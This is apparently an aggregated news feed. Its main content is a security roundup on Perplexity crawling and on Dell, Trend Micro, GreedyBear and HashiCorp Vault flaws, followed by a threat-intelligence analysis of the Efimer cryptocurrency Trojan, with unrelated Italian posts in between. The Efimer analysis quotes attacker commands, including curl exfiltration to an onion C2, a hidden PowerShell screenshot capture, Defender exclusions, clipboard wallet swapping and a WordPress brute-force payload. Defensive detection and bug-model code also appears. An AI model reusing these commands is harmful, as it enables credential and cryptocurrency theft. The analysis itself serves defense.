


This Week in Security: Perplexity v Cloudflare, GreedyBear, and HashiCorp


The Internet is fighting over whether robots.txt applies to AI agents. It all started when Cloudflare published a blog post detailing what the company was seeing from Perplexity crawlers. Of course, automated web crawling is part of how the modern Internet works, and almost immediately after the first web crawler was written, one managed to DoS (Denial of Service) a web site back in 1994. That is when the robots.txt file was first designed.

Make no mistake, robots.txt on its own is nothing more than a polite request for someone else on the Internet to not index your site. The more aggressive approach is to add rules to a Web Application Firewall (WAF) that detects and blocks a web crawler based on the user-agent string and source IP address. Cloudflare makes the case that Perplexity is not only intentionally ignoring robots.txt, but also actively disguising their web-crawling traffic by using IP addresses outside their normal range for these requests.

This isn’t the first time Perplexity has landed in hot water over their web scraping, AI learning endeavors. But Perplexity has published a blog post explaining that this is different!

And there’s genuinely an interesting argument to be made that robots.txt is aimed at indexing and AI training traffic, and that agentic AI requests are a different category. Put simply, Perplexity bots ignore robots.txt when a live user asks them to. Is that bad behavior, or what we should expect? This question will have to be settled as AI agents become more common.

Breaking Into the Vault


Researchers at Cisco Talos took a look at the Dell ControlVault, a Hardware Security Module (HSM) built into many Dell laptops. The firmware running on these embedded processors had some problems, including a stack overflow and other memory-related issues. Usually the potential for abuse of this kind of attack is limited mostly to the theoretical realm, but this embedded HSM also includes USB pins that can be accessed with a custom connector. The vulnerabilities found therefore represent a real attack scenario, where the firmware on the HSM can be tampered with via nothing more than physical access. To prove the point, the Talos write-up includes a great video of a compromised machine accepting a green onion as a valid fingerprint for Windows Login.

Trend Micro In the Wild


Trend Micro’s Apex One system is under active exploitation, as a pair of vulnerabilities allow an authenticated attacker to inject system commands in the system’s management console. The full fix is expected to roll out later this month, but a mitigation disables a specific feature of the console, the Remote Install Agent. This leads to the obvious conclusion that the installation process was allowing for code execution.

GreedyBear


There was an interesting malware campaign run this year, by a group that Koi Security is calling GreedyBear. The campaign could be called a blitz, where malicious browser extensions, ransomware binaries, and scammy websites were all employed at once, with the goal of stealing cryptocurrency. The surprising thing is that so far not much over $1 million has been reported as stolen through the campaign.

The first technique used was “Extension Hollowing”, where safe, boring browser extensions are published and maintained for a few months. Good reviews come in naturally or are purchased, and the publisher appears trustworthy. Then the extension is updated, with malicious code suddenly shipping. These extensions are now sniffing for user input and form-filled data.

The second technique used was the old classic, packing malware into cracked and pirated software. The source of many of these malicious binaries seems to be primarily Russian piracy sites.

The final approach discovered was the simple scam website, often typo-squatting on nearly-legitimate domain names. These sites advertised fake hardware wallets or wallet repair, but only existed to steal whatever information would-be customers were willing to share.

The question may be raised, why does Koi Security believe all this activity is connected? The answer boils down to a single IP address, 185.208.156.66. This was the Command and Control server for the entire network of activity, and should be seen as a definite red flag in logs and records.

HashiCorp Vault Audit


The fine folks at Cyata took a crack at HashiCorp’s Vault, a source-available secrets storage solution. And they discovered a host of subtle but important issues. The first on the list is an outstanding find, and it deals with how Vault protects against brute-force attacks. It’s supposed to be a simple counter that locks out password attempts for a while, once a threshold of failures has been reached. The problem is that usernames aren’t case sensitive, but the failure counter is case sensitive in tracking password failures. Tried guessing the admin password too many times? Try the Admin account next.

The Multi-Factor Authentication has some issues, like the TOTP code reuse protection. This attempts to enforce that a code is only used once while valid. The problem is that a code of “ 123456” and “123456” both evaluate the same for the TOTP validation itself, but as different codes for the reuse protection. This could enable an attacker to first abuse the reuse protection error message to identify a valid but used code, and then insert the space to be able to use the code for authentication.

After authentication, this same style of attack is possible again, this time targeting the root policy protections. An admin cannot assign this “root” policy, but can assign a “ root” policy. Those are treated as different policy identifiers by the validation code, but the same thing in the final implementation.
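The lockout, TOTP-reuse and “ root” policy findings above share one root cause: the guard and the check it protects disagree about which inputs are the same. The following is an added example, not Vault's code; the class names, the threshold of three failures and the normalisation rules are assumptions chosen to model the behaviour the article describes, with the flawed and the hardened key side by side.

```python
"""Toy model of a canonicalisation mismatch between a guard and the check
it protects. Not Vault code: every name and threshold here is hypothetical."""

MAX_FAILURES = 3  # assumed lockout threshold


class Authenticator:
    def __init__(self, users, canonical_guard):
        # Account lookup is case-insensitive, as the article describes.
        self.users = {name.lower(): pw for name, pw in users.items()}
        self.canonical_guard = canonical_guard
        self.failures = {}

    def guard_key(self, username):
        # Hardened: count failures under the same key the lookup uses.
        # Flawed: count them under the string exactly as it was typed.
        return username.lower() if self.canonical_guard else username

    def login(self, username, password):
        key = self.guard_key(username)
        if self.failures.get(key, 0) >= MAX_FAILURES:
            return "locked"
        if self.users.get(username.lower()) == password:
            return "ok"
        self.failures[key] = self.failures.get(key, 0) + 1
        return "denied"


class TotpReuseGuard:
    def __init__(self, valid_code, canonical_guard):
        self.valid_code = valid_code  # stands in for the real TOTP computation
        self.canonical_guard = canonical_guard
        self.used = set()

    def verify(self, submitted):
        # The validator below ignores surrounding whitespace, so the reuse
        # cache has to be keyed on the stripped value as well.
        cache_key = submitted.strip() if self.canonical_guard else submitted
        if cache_key in self.used:
            return "already used"
        if submitted.strip() != self.valid_code:
            return "invalid"
        self.used.add(cache_key)
        return "ok"


def attempts_evaluated(auth, spellings, wrong_password="wrong"):
    """Regression check: how many wrong passwords are actually evaluated
    against one account before every spelling of its name is locked."""
    evaluated = 0
    for name in spellings:
        while auth.login(name, wrong_password) == "denied":
            evaluated += 1
    return evaluated


if __name__ == "__main__":
    spellings = ["admin", "Admin", "ADMIN"]
    for canonical in (False, True):
        auth = Authenticator({"admin": "s3cret"}, canonical_guard=canonical)
        print("canonical guard:", canonical,
              "-> attempts evaluated:", attempts_evaluated(auth, spellings))
```

The fix in both classes is the same: derive the guard's key from the exact value the downstream check will act on, rather than from the raw request field.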

And finally, they discovered a Remote Code Execution flaw, via plugin installation. This one requires admin access, but an information leak and an audit log that allows writing to anywhere on the disk is enough to execute code injected in that audit log. This seems to be the first RCE ever made public in Vault, which is an impressive statement for both HashiCorp and Cyata.

Bits and Bytes


Nvidia isn’t taking last week’s talk of backdoors lying down, taking the offensive this week to reassure everyone that “There are no back doors in NVIDIA chips.” There’s a separate bit of news that US lawmakers are considering legislation that would require a kill-switch and location verification in future hardware.

It’s reassuring to be reminded that cyber-criminals do get captured and extradited. A Nigerian man was arrested in France and is being extradited to the US on multiple charges of fraud, identity theft, and other crimes. No word on whether the Nigerian national was or has claimed to be a prince.

And finally, filed in the “awkward” category, Google has disclosed that they were also a victim in the Salesforce hacks that Google researchers discovered and first publicized. These were good-old social engineering campaigns, where the attacker contacted an employee at the target company and convinced them to read off an eight-digit security code. A group calling itself ShinyHunters has started an exploitation campaign using data pilfered in the attacks.


hackaday.com/2025/08/08/this-w…




The Halo 3C is a vape detector installed in schools and public housing. A young hacker found it contains microphones and that it can be turned into an audio bug, raising privacy concerns.#News #Hacking


It Looks Like a School Vape Detector. A Teen Hacker Showed It Could Become an Audio Bug


This article was produced with support from WIRED.

A couple of years ago, a curious, then-16-year-old hacker named Reynaldo Vasquez-Garcia was on his laptop at his Portland-area high school, seeing what computer systems he could connect to via the Wifi—“using the school network as a lab,” as he puts it—when he spotted a handful of mysterious devices with the identifier “IPVideo Corporation.”

After a closer look and some googling, Garcia figured out that a company by that name was a subsidiary of Motorola, and the devices he’d found in his school seemed to be something called the Halo 3C, a “smart” smoke and vape detection gadget. “They look just like smoke detectors, but they have a whole bunch of features like sensors and stuff,” Garcia says.

As he read more, he was intrigued to learn that the Halo 3C goes beyond detecting smoke and vaping—including a distinct feature for discerning THC vaping in particular. It also has a microphone for listening out for “aggression,” gunshots, and keywords such as someone calling for help, a feature that to Vasquez-Garcia immediately raised concerns of more intrusive surveillance.





Dell U2312HM monitor - This is an automated post from FediMercatino.it

Price: 50 €

For sale: 23" Dell U2312HM monitor, in perfect cosmetic condition, not even a scratch. The pixels are perfect, not a single one burnt out or dead. The VGA connector is slightly loose: if you move the PC every day it is a bit annoying, but if you keep it in one place there are no problems.

The power cable and the VGA/HDMI cable are included.

Delivery area: Milan/Pavia. Given the price and the size, I don't think shipping is worthwhile.




Italian hotels breached by the “Mydocs” criminal group. Here are the affected properties


@Informatica (Italy e non Italy 😁)
Identity documents stolen from Italian hotels, tens of thousands for sale on the dark web. Three accommodation facilities in our country are reported to have come under attack, all targeted between June and July 2025. Today CERT AGID announced



Is It Time To Retire the TP4056?


The Texas Instruments TP4056 is the default charge-controller chip for any maker or hacker working with lithium batteries. And why not? You can get perfectly-functional knockoffs on handy breakout boards from the usual online sources for pennies. Betteridge’s Law aside, [Lefty Maker] thinks that it may well be time to move on from the TP4056 and spends his latest video telling us why, along with promoting an alternative.

His part of choice is another TI chip, the BQ25185. [Lefty] put together his own charge controller board to show off the capabilities of this chip — including variable under- and over-charge protection voltages. Much of his beef with the TP4056 has less to do with that chip than with the cheap charge modules it comes on: when he crows about the lack of mounting holes and proper USB-PD on the knock-off modules, it occurs to us he could have had those features on his board even if he’d used a TP4056.

On the other hand, the flexibility offered by the BQ25185 is great to future-proof projects in case the dominant battery chemistry changes, or you just change your mind about what sort of battery you want to use. Sure, you’d need to swap a few resistors to set new trigger voltages and charging current, but that beats starting from scratch.

[Lefty Maker] also points out some of the advantages to making your own boards rather than relying on cheap modules. Namely, you can make them however you want. From a longer USB port to indicator LEDs and a built-in battery compartment, this charging board is exactly what [Lefty Maker] wants. Given how cheap custom PCBs are these days, it’s not hard to justify rolling your own.

The same cannot be said of genuine TI silicon, however. While the BQ25185 has a few good features that [Lefty Maker] points out in the video, we’re not sure the added price is worth it. Sure, it’s only a couple bucks, but that’s more than a 300% increase!

We’ve seen other projects pushing alternative charge controllers, but for now the TP4056 reigns as the easy option.

youtube.com/embed/8npqPz5fvnI?…


hackaday.com/2025/08/08/is-it-…



The US accelerates on laser defense against missiles and drones. Here are the latest developments

@Notizie dall'Italia e dal mondo

In recent years the US Army has accelerated the development of directed-energy weapons, and on the basis of the results obtained it is evaluating wider use of them in missile defense as well. “The technologies for energy lasers




More than 16,000 people contacted the Numero Bianco in the past year


Requests to our infoline rose by 14%: Liguria and Lazio had the highest number of calls in proportion to their population

580 requests for help with voluntary death


Over the last 12 months, 16,035 requests for information on end-of-life matters arrived through the Numero Bianco (06 9931 3409), coordinated by Valeria Imbrogno, partner of Dj Fabo, and through emails sent directly to the Associazione Luca Coscioni. That is an average of 44 requests per day, up 14 percent on the previous year.

The service is active every day to listen, guide and inform about the options that Italian law currently offers on end-of-life matters, on topics such as euthanasia and medically assisted suicide, living wills, withdrawal of treatment and deep palliative sedation. In the absence of adequate institutional responses, the service helps build legal and humane paths toward freedom of choice at the end of life.

In detail, the requests mainly concerned euthanasia and medically assisted suicide (about 5 per day), but also withdrawal of treatment and deep palliative sedation (more than one per day). Practical questions about accessing medically assisted voluntary death in Switzerland or through legal routes in Italy also increased, coming from 580 people (51 percent women, 49 percent men), compared with 533 the previous year.

Based on the available information on the geographic origin of those who contacted the service, where provided, a regional projection weighted by population was produced, giving a snapshot of the demand for help in dying in Italy.


The ranking of regions with the highest number of requests per 100,000 inhabitants puts Liguria in first place with 48 per 100,000 inhabitants, followed by Lazio with 43 requests. In third place is Tuscany with 35, alongside Friuli Venezia Giulia. They are followed by Umbria, Emilia-Romagna and Lombardy with 33 requests, then Piedmont with 28, and Veneto and Marche with 26.

The article More than 16,000 people contacted the Numero Bianco in the past year comes from Associazione Luca Coscioni.



NetanyONU


@Giornalismo e disordine informativo
articolo21.org/2025/08/netanyo…
Netanyahu is playing at being the UN. With his own personal resolution he has decided to occupy Gaza with the army in blue-helmet mode and then hand it over to an Arab league in peace-keeping form. All while asking Gazans to self-deport to the south of the Strip, heedless of creating a concentration camp with a very high density, just to



The European Media Freedom Act enters into force today. Italy is already non-compliant


@Giornalismo e disordine informativo
articolo21.org/2025/08/italia-…
Today, 8 August 2025, marks a historic date for press freedom in Europe: the European Media Freedom Act (EMFA) officially enters into force, the regulation that strengthens the guarantees of independence and pluralism



Scammers mass-mailing the Efimer Trojan to steal crypto



Introduction


In June, we encountered a mass mailing campaign impersonating lawyers from a major company. These emails falsely claimed the recipient’s domain name infringed on the sender’s rights. The messages contained the Efimer malicious script, designed to steal cryptocurrency. This script also includes additional functionality that helps attackers spread it further by compromising WordPress sites and hosting malicious files there, among other techniques.

Report summary:

  • Efimer is spreading through compromised WordPress sites, malicious torrents, and email.
  • It communicates with its command-and-control server via the Tor network.
  • Efimer expands its capabilities through additional scripts. These scripts enable attackers to brute-force passwords for WordPress sites and harvest email addresses for future malicious email campaigns.

Kaspersky products classify this threat with the following detection verdicts:

  • HEUR:Trojan-Dropper.Script.Efimer
  • HEUR:Trojan-Banker.Script.Efimer
  • HEUR:Trojan.Script.Efimer
  • HEUR:Trojan-Spy.Script.Efimer.gen


Technical details

Background


In June, we detected a mass mailing campaign that was distributing identical messages with a malicious archive attached. The archive contained the Efimer stealer, designed to pilfer cryptocurrency. This malware was dubbed “Efimer” because the word appeared in a comment at the beginning of its decrypted script. Early versions of this Trojan likely emerged around October 2024, initially spreading via compromised WordPress websites. While attackers continue to use this method, they expanded their distribution in June to include email campaigns.

Part of the script with comments

Email distribution


The emails that users received claimed that lawyers from a large company had reviewed the recipient’s domain and found words or phrases in its name that infringed upon their registered trademarks. The emails threatened legal action but offered to drop the lawsuit if the domain owner changed the domain name. Furthermore, they even expressed willingness to purchase the domain. The specific domain was never mentioned in the email. Instead, the attachment supposedly contained “details” about the alleged infringement and the proposed buyout amount.

Sample email

In a recent phishing attempt, targets received an email with a ZIP attachment named “Demand_984175” (MD5: e337c507a4866169a7394d718bc19df9). Inside, recipients found a nested, password-protected archive and an empty file named “PASSWORD – 47692”. It’s worth noting the clever obfuscation used for the password file: instead of a standard uppercase “S”, the attackers used the Unicode character U+1D5E6. This subtle change was likely implemented to prevent automated tools from easily extracting the password from the filename.

Archive contents
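The filename trick described above fails against tooling that folds compatibility characters before matching. The following is an added example, not taken from the report; the sample name is constructed (the report gives the visible name and the code point U+1D5E6, but not which “S” was swapped, so the first one is assumed), and the function names and the password regex are illustrative.

```python
import re
import unicodedata

# Constructed sample: "PASSWORD", en dash, digits, with one "S" replaced by
# U+1D5E6 as the report describes. The position of the swap is an assumption.
SAMPLE_NAME = "PA\U0001D5E6SWORD \u2013 47692"

# Illustrative pattern a sandbox might use to pull a password from a name.
PASSWORD_HINT = re.compile(r"pass(?:word)?\W*(\d{3,})", re.IGNORECASE)


def naive_password_hint(name):
    """What a tool recovers when it matches on the raw code points."""
    m = PASSWORD_HINT.search(name)
    return m.group(1) if m else None


def styled_ascii_lookalikes(name):
    """List characters that are not ASCII themselves but fold to ASCII
    under NFKC, e.g. Mathematical Alphanumeric Symbols."""
    findings = []
    for ch in name:
        folded = unicodedata.normalize("NFKC", ch)
        if ch != folded and folded.isascii():
            findings.append(
                (f"U+{ord(ch):04X}", unicodedata.name(ch, "UNNAMED"), folded)
            )
    return findings


def analyse_name(name):
    """Fold the name with NFKC, then report look-alikes and any password."""
    folded = unicodedata.normalize("NFKC", name)
    m = PASSWORD_HINT.search(folded)
    return {
        "folded": folded,
        "lookalikes": styled_ascii_lookalikes(name),
        "password_hint": m.group(1) if m else None,
    }


if __name__ == "__main__":
    print("raw match:   ", naive_password_hint(SAMPLE_NAME))
    print("after NFKC:  ", analyse_name(SAMPLE_NAME))
```

A styled letter inside an otherwise plain ASCII word in an attachment name is itself a useful signal, independent of whether a password can be recovered.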

If the user unzips the password-protected archive, they’ll find a malicious file named “Requirement.wsf”. Running this file infects their computer with the Efimer Trojan, and they’ll likely see an error message.

Error message

Here’s how this infection chain typically plays out. When the Requirement.wsf script first runs, it checks for administrator privileges. It does this by attempting to create and write data to a temporary file at C:\Windows\System32\wsf_admin_test.tmp. If the write is successful, the file is then deleted. What happens next depends on the user’s access level:

  • If the script is executed on behalf of a privileged user, it adds the C:\Users\Public\controller folder to the Windows Defender antivirus exclusions. This folder will then be used to store various files. It also adds to exclusions the full path to the currently running WSF script and the system processes C:\Windows\System32\exe and C:\Windows\System32\cmd.exe. Following this, the script saves two files to the aforementioned path: “controller.js” (containing the Efimer Trojan) and “controller.xml”. Finally, it creates a scheduled task in Windows, using the configuration from controller.xml.
  • If the script is run with limited user privileges, it saves only the controller.js file to the same path. It adds a parameter for automatic controller startup to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run\controller registry key. The controller is then launched via the WScript utility.

Afterward, the script uses WScript methods to display an error message dialog box and then exits. This is designed to mislead the user, who might be expecting an application or document to open, when in reality, nothing useful occurs.

Efimer Trojan


The controller.js script is a ClipBanker-type Trojan. It’s designed to replace cryptocurrency wallet addresses the user copies to their clipboard with the attacker’s own. On top of that, it can also run external code received directly from its command-and-control server.

The Trojan starts by using WMI to check if Task Manager is running.

If it is, the script exits immediately to avoid detection. However, if Task Manager isn’t running, the script proceeds to install a Tor proxy client on the victim’s computer. The client is used for communication with the C2 server.

The script has several hardcoded URLs to download Tor from. This ensures that even if one URL is blocked, the malware can still retrieve the Tor software from the others. The sample we analyzed contained the following URLs:

https://inpama[.]com/wp-content/plugins/XZorder/ntdlg.dat
eskisehirdenakliyat[.]com/wp-c…
https://ivarchasv[.]com/wp-content/plugins/XZorder/ntdlg.dat
https://echat365[.]com/wp-content/plugins/XZorder/ntdlg.dat
https://navrangjewels[.]com/wp-content/plugins/XZorder/ntdlg.dat

The file it downloads from one of the URLs (A46913AB31875CF8152C96BD25027B4D) is the Tor proxy service. The Trojan saves it to C:\Users\Public\controller\ntdlg.exe. If the download fails, the script terminates.

Assuming a successful download, the script launches the file with the help of WScript and then goes dormant for 10 seconds. This pause likely allows the Tor service to establish a connection with the Onion network and initialize itself. Next, the script attempts to read a GUID from C:\Users\Public\controller\GUID. If the file cannot be found, it generates a new GUID via createGUID() and saves it to the specified path.

The GUID format is always vs1a-<4 random hex characters>, for example, vs1a-1a2b.

The script then tries to load a file named “SEED” from C:\Users\Public\controller\SEED. This file contains mnemonic phrases for cryptocurrency wallets that the script has collected. We’ll delve into how it finds and saves these phrases later in this post. If the SEED file is found, the script sends it to the server and then deletes it. These actions assume that the script might have previously terminated improperly, which would have prevented the mnemonic phrases from being sent to the server. To avoid losing collected data in case of an error, the malware saves them to a file before attempting to transmit them.

At this point, the controller concludes its initialization process and enters its main operation cycle.

The main loop


In each cycle of operation, the controller checks every 500 milliseconds whether Task Manager is running. As before, if it is, the process exits.

If the script doesn’t terminate, it begins to ping the C2 server over the Tor network. To do this, the script sends a request containing a GUID (Globally Unique Identifier) to the server. The server’s response will be a command. To avoid raising suspicion with overly frequent requests while maintaining constant communication, the script uses a timer (the p_timer variable).

As we can see, every 500 milliseconds (half a second), immediately after checking if Task Manager is running, p_timer decrements by 1. When the variable reaches 0 (it’s also zero on the initial run), the timer is reset using the following formula: the PING_INT variable, which is set to 1800, is multiplied by two, and the result is stored in p_timer. At one decrement every half second, this leaves 1800 seconds, or 30 minutes, until the next update. After the timer updates, the PingToOnion function is called, which we discuss next. Many similar malware strains constantly spam the network, hitting their C2 server for commands. The behavior quickly gives them away. A timer allows the script to stay under the radar while maintaining its connection to the server. Making requests only once every half an hour makes them much harder to spot in the overall traffic flow.

The PingToOnion function works hand-in-hand with CheckOnionCMD. In the first one, the script sends a POST request to the C2 using the curl utility, routing the request through a Tor proxy located at localhost:9050 at the address:

http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php

The server’s response is saved to the user’s %TEMP% directory at %TEMP%\cfile.

curl -X POST -d "' + _0x422bc3 + '" --socks5-hostname localhost:9050 ' + PING_URL + ' --max-time 30 -o ' + tempStrings + '\\cfile

After a request is sent to the server, CheckOnionCMD immediately kicks in. Its job is to look for a server response in a file named “cfile” located in the %TEMP% directory. If the response contains a GUID command, the malware does nothing. This is likely a PONG response from the server, confirming that the connection to the C2 server is still alive and well. However, if the first line of the response contains an EVAL command, it means all subsequent lines are JavaScript code. This code will then be executed using the eval function.

Regardless of the server’s response, the Trojan then targets the victim’s clipboard data. Its primary goal is to sniff out mnemonic phrases and swap copied cryptocurrency wallet addresses with the attacker’s own wallet addresses.

First, it scans the clipboard for strings that look like mnemonic (seed) phrases.

If it finds any, these phrases are saved to a file named “SEED” (similar to the one the Trojan reads at startup). This file is then exfiltrated to the server using the PingToOnion function described above with the action SEED parameter. Once sent, the SEED file is deleted. The script then takes five screenshots (likely to capture the use of mnemonic phrases) and sends them to the server as well.

They are captured with the help of the following PowerShell command:

powershell.exe -NoProfile -WindowStyle Hidden -Command "$scale = 1.25; Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $sw = [System.Windows.Forms.SystemInformation]::VirtualScreen.Width; $sh = [System.Windows.Forms.SystemInformation]::VirtualScreen.Height; $w = [int]($sw * $scale); $h = [int]($sh * $scale); $bmp = New-Object Drawing.Bitmap $w, $h; $g = [Drawing.Graphics]::FromImage($bmp); $g.ScaleTransform($scale, $scale); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size); $bmp.Save(\'' + path.replace(/\\/g, '\\\\') + '\', [Drawing.Imaging.ImageFormat]::Png); ' + '$g.Dispose(); $bmp.Dispose();"

The FileToOnion function handles sending files to the server. It takes two arguments: the file itself (in this case, a screenshot) and the path where it needs to be uploaded.

Screenshots are sent to the following path on the server:

http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/recvf.php

Files are also sent via a curl command:

curl -X POST -F "file=@' + screenshot + '" ' + '-F "MGUID=' + GUID + '" ' + '-F "path=' + path + '" ' + '--socks5-hostname localhost:9050 "' + FILE_URL + '"

After sending the file, the script goes idle for 50 seconds. Then, it starts replacing cryptocurrency wallet addresses. If the clipboard content is only numbers, uppercase and lowercase English letters, and includes at least one letter and one number, the script performs additional checks to determine if it’s a Bitcoin, Ethereum, or Monero wallet. If a matching wallet is found in the clipboard, the script replaces it according to the following logic:

  • Short Bitcoin wallet addresses (starting with “1” or “3” and 32–36 characters long) are replaced with a wallet whose first two characters match those in the original address.
  • For long wallet addresses that start with “bc1q” or “bc1p” and are between 40 and 64 characters long, the malware finds a substitute address where the last character matches the original.

  • If a wallet address begins with “0x” and is between 40 and 44 characters long, the script replaces it with one of several Ethereum wallets hardcoded into the malware. The goal here is to ensure the first three characters match the original address.

  • For Monero addresses that start with “4” or “8” and are 95 characters long, attackers use a single, predefined address. Similar to other wallet types, the script checks for matching characters between the original and the swapped address. In the case of Monero, only the first character needs to match. This means the malware will only replace Monero wallets that start with “4”.

This clipboard swap is typically executed with the help of the following command:

cmd.exe /c echo|set/p= + new_clipboard_data + |clip

After each swap, the script sends data to the server about both the original wallet and the replacement.

Distribution via compromised WordPress sites


As mentioned above, in addition to email, the Trojan spreads through compromised WordPress sites. Attackers search for poorly secured websites, brute-force their passwords, and then post messages offering to download recently released movies. These posts include a link to a password-protected archive containing a torrent file.

Here's an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/

The torrent file downloads a folder to the device. This folder contains something that looks like a movie in XMPEG format, a “readme !!!.txt” text file, and an executable that masquerades as a media player.

Downloaded files

To watch a movie in the XMPEG format, the user would seemingly need to launch xmpeg_player.exe. However, this executable is actually another version of the Efimer Trojan installer. Similar to the WSF variant, this EXE installer extracts the Trojan’s main component into the C:\Users\Public\Controller folder, but it’s named “ntdlg.js”. Along with the Trojan, the installer also extracts the Tor proxy client, named “ntdlg.exe”. The installer then uses PowerShell to add the script to startup programs and the “Controller” folder to Windows Defender exclusions.

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Controller\'

The extracted Trojan is almost identical to the one spread via email. However, this version’s code includes spoofed wallets for Tron and Solana, in addition to the Bitcoin, Ethereum, and Monero wallets. Also, the GUID for this version starts with “vt05”.
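The command lines quoted in this report (the Defender exclusion, curl through a local Tor SOCKS port, the script host launched from the Public folder, the hidden screen capture and the clip pipe) can be turned into host-side detections. The following is an added example, not part of the original report: the host names, the event format, the placeholder URL and the two-rule threshold are assumptions, the sample command lines are constructed to resemble those quoted above, and 127.0.0.1 is accepted as an equivalent of localhost.

```python
import re
from collections import defaultdict

# One pattern per behaviour described in the report. Individually some of
# these occur in legitimate use, so hosts are flagged on combinations.
RULES = {
    "defender_exclusion_public": re.compile(
        r"Add-MpPreference\b.*-ExclusionPath\s+[\x22\x27]?C:\\Users\\Public\\",
        re.I),
    "curl_via_local_tor_socks": re.compile(
        r"\bcurl(\.exe)?\b.*--socks5-hostname\s+(localhost|127\.0\.0\.1):9050\b",
        re.I),
    "script_host_from_public": re.compile(
        r"\b[wc]script(\.exe)?\b.*C:\\Users\\Public\\[^\x22\x27]*\.(js|wsf)\b",
        re.I),
    "hidden_powershell_screen_capture": re.compile(
        r"-WindowStyle\s+Hidden\b.*CopyFromScreen", re.I),
    "clipboard_overwrite_via_clip": re.compile(
        r"echo\|set\s*/p=.*\|\s*clip\b", re.I),
}

# Constructed process-creation events: (host, command line).
SAMPLE_EVENTS = [
    ("WS-014", r"cmd.exe /c powershell -Command Add-MpPreference "
               r"-ExclusionPath 'C:\Users\Public\Controller\'"),
    ("WS-014", r'"C:\Windows\System32\wscript.exe" '
               r'"C:\Users\Public\controller\controller.js"'),
    ("WS-014", r'curl -X POST -d "constructed-body" --socks5-hostname '
               r"localhost:9050 http://c2-placeholder.onion/route.php "
               r"--max-time 30 -o C:\Users\alice\AppData\Local\Temp\cfile"),
    ("WS-014", r"powershell.exe -NoProfile -WindowStyle Hidden -Command "
               r'"$g.CopyFromScreen(0, 0, 0, 0, $bmp.Size)"'),
    ("WS-014", r"cmd.exe /c echo|set/p=ADDRESS-PLACEHOLDER|clip"),
    # Benign look-alikes on a developer machine.
    ("DEV-03", r"cmd.exe /c echo|set/p=build finished|clip"),
    ("DEV-03", r"curl https://example.com/health --max-time 5"),
    ("DEV-03", r"powershell -Command Add-MpPreference "
               r"-ExclusionPath 'D:\build\out'"),
]


def match_rules(cmdline):
    """Names of all rules that match a single command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def triage(events, min_rules=2):
    """Group hits per host and keep hosts with at least min_rules distinct
    behaviours, which filters out single benign matches."""
    hits = defaultdict(set)
    for host, cmdline in events:
        hits[host].update(match_rules(cmdline))
    return {h: sorted(r) for h, r in hits.items() if len(r) >= min_rules}


if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```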

Additional scripts


On some compromised machines, we uncovered several other intriguing scripts communicating with the same .onion domain as the previously mentioned ones. We believe the attackers installed these via an eval command to execute payloads from their C2 server.

WordPress site compromise


Among these additional scripts, we found a file named “btdlg.js” (MD5: 0f5404aa252f28c61b08390d52b7a054). This script is designed to brute-force passwords for WordPress sites.

Once executed, it generates a unique user ID, such as fb01-<4 random hex characters>, and saves it to C:\Users\Public\Controller\.

The script then initiates multiple processes to launch brute-force attacks against web pages. The code responsible for these attacks is embedded within the same script, prior to the main loop. To trigger this functionality, the script must be executed with the “B” parameter. Within its main loop, the script initiates itself by calling the _runBruteProc function with the parameter “B”.

After a brute-force attack is completed, the script returns to the main loop. Here, it will continue to spawn new processes until it reaches a hardcoded maximum of 20.

Thus, the script supports two modes – brute-force and the main one, responsible for the initial launch. If the script is launched without any parameters, it immediately enters the main loop. From there, it launches a new instance of itself with the “B” parameter, kicking off a brute-force attack.

The script’s operation cycle involves both the brute-force code and the handler for its core logic

The brute-force process starts via the GetWikiWords function: the script retrieves a list of words from Wikipedia. This list is then used to identify new target websites for the brute-force attack. If the script fails to obtain the word list, it waits 30 minutes before retrying.

The script then enters its main operation loop. Every 30 minutes, it initiates a request to the C2 server. This is done with the help of the PingToOnion method, which is consistent with the similarly named methods found in other scripts. It sends a BUID command, transmitting a unique user ID along with brute-force statistics. This includes the total number of domains attacked, and the count of successful and failed attacks.

After this, the script utilizes the GetRandWords function to generate a list of random words sourced from Wikipedia.

Finally, using these Wikipedia-derived random words as search parameters, the script employs the getSeDomains function to search Google and Bing for domains to target with brute-force attacks.

Part of the getSeDomains function

The ObjID function calculates an eight-digit hexadecimal hash, which acts as a unique identifier for a special object (obj_id). In this case, the special object is a file containing brute-force information. This includes a list of users for password guessing, success/failure flags for brute-force attempts, and other script-relevant data. For each distinct domain, this data is saved to a separate file. The script then checks if this identifier has been encountered before. All unique identifiers are stored in a file named “UDBXX.dat”. The script searches the file for a new identifier, and if one isn’t found, it’s added. This identifier tracking helps save time by avoiding reprocessing of already known domains.

For every new domain, the script makes a request using the WPTryPost function. This is an XML-RPC function that attempts to create a test post using a potential username and password. The command to create the post looks like this:
<?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><string>1</string></value></param><param><value><string>' + %LOGIN%+ '</string></value></param>' + '<param><value><string>' + %PASSWORD%+ '</string></value></param>' + '<param><value><struct>' + '<member>' + '<name>title</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>description</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_keywords</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_excerpt</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '</struct></value></param>' + '<param><value><boolean>1</boolean></value></param>' + '</params>' + '</methodCall>
When the XML-RPC request is answered, whether successfully or not, the WPGetUsers function kicks in to grab users from the domain. This function hits the domain at /wp-json/wp/v2/users, expecting a list of WordPress site users in return.

This list of users, along with the domain and counters tracking the number of users and passwords brute-forced, gets written to the special object file described above. The ID for this file is calculated with the help of ObjID. After processing a page, the script lies dormant for five seconds before moving on to the next one.

